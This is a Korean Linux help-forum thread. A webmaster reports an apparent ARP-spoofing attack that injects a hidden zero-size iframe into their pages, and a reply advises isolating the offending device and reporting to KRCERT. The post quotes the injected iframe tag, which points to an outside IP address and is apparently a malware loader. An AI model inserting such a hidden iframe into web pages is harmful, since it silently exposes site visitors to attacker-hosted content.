질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

웹서버가 arp 스푸핑 당하는것같은데 도와주세요

작성자 정보

• 임성택 작성
컨텐츠 정보

본문

html 상단에

<iframe src=http://61.100.183.184/asp/2.htm width=0 height=0></iframe>

이라는 내용이 적혀 나옵니다.

물론 소스에는 없는 내용이구요

arp watch 를 통해서 flip flop 되는 주소 하나를 찾아 냈는데요

이젠 어떻게 해야 하나요?????

ㅡㅜ 초보적인 질문이더라도 용서해 주시고요

조언 부탁드립니다

관련자료

양봉열님의 댓글

• 양봉열
웹 서버를 대상으로 ARP 스푸핑이 발생하고 있다면, 해당 MAC 주소를 가진 장비를 찾아서 네트워크로부터 격리한 후 iframe이 사라지는지 확인해보세요.

그리고 www.krcert.or.kr로 신고하시는게 가장 확실하고 편한 방법입니다. 피해 범위를 제대로 조사하고 원인을 분석하지 않으면 재발하기 쉽습니다.

임성택님의 댓글

• 임성택
이제 정상을 찾았어요 ^^
arp스푸핑 아니라고 하던 서버관리회사를 계속 귀찮게 했더니
널뛰던 arp가 얌전하네요 ㅡㅜ
감사합니다..
그리고 또 이런일 있으면 위 주소로 한번 들어가 봐야겠어요 ^^
감사합니다.

공지사항

뉴스광장

• 현재 회원수 :  60,138 명
  • 현재 강좌수 :  36,196 개
  • 현재 접속자 :  390 명